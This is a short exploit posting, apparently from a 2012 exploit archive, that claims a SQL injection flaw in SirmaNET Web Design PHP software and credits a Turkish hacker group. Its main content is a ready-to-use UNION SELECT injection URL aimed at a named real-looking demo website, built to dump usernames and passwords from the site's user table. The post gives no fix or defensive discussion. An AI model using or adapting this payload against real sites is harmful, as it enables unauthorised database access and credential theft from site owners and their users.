# Exploit Title: SirmaNET Web Design SQL Injection Vulnerability
# Date: 09/01/2012 - 03.04
# Author: 3spi0n
# Software Website: www.sirmanet.com
# Tested On: BackTrack 5 - Win7 Ultimate
# Platform: Php
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
[$] Vulnerable File:

[~] Changer

[$] Demo Sites:

[~] www.yigitemlakfinans.com/index.php?sayfa=emlaklar.php&kid1=63" [SQL
Injection]

[#] Analyzing ...

[~]
www.yigitemlakfinans.com//index.php?sayfa=emlaklar.php&kid1=63%20union%20select%201,2,group_concat%28username%29,4,group_concat%28password%29,6,7,8%20from%20user--+-
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

# Dar bi Koridor Benimki, Kendimi Aradigim.

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

# SpyDevilz.iN - Turkish Hacker Platform

# Contact: Twitter.Com/RigidusCO - Facebook.Com/3spi0ne

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

- Mr.PaPaRoSSe And 3spi0n -

Bug Researcher Group - TURKEY

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>